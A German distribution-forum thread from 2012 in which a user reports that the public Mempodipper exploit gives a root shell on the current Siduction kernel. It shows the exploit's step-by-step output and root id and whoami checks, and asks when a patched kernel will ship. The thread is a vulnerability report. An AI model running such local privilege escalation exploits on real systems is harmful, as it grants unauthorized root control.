Root-Rechte durch Speicherzugriff

Started by orinoco, 2012/01/23, 18:56:28

Previous topic - Next topic
Print
Go Down Pages1
User actions

orinoco

2012/01/23, 18:56:28
Angeregt durch http://heise.de/-1419608 habe ich den aktuellen Siduction-Kernel getestet:

Code Select
orinoco@jake:~/Temp/mempodipper$ ./a.out
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/4214/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x401fa8.
[+] Calculating su padding.
[+] Seeking to offset 0x401f99.
[+] Executing su with shellcode.
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),102(scanner),103(lpadmin),106(kvm),107(netdev),113(fuse),115(powerdev),120(vboxusers),1000(orinoco),1001(shutdown)
# whoami
root
# uname -a
Linux jake 3.2-1.towo.3-siduction-amd64 #1 SMP PREEMPT Fri Jan 13 11:16:56 UTC 2012 x86_64 GNU/Linux

Wann ist mit einem gefixten Kernel zu rechnen?

P.S. Hoffe die Info ist in diesem Unterforum richtig.

towo

#1
2012/01/23, 18:58:07 Last Edit: 2013/11/10, 04:26:09 by ayla
Ich gehe nicht zum Karneval, ich verleihe nur manchmal mein Gesicht.
Print
Go Up Pages1
User actions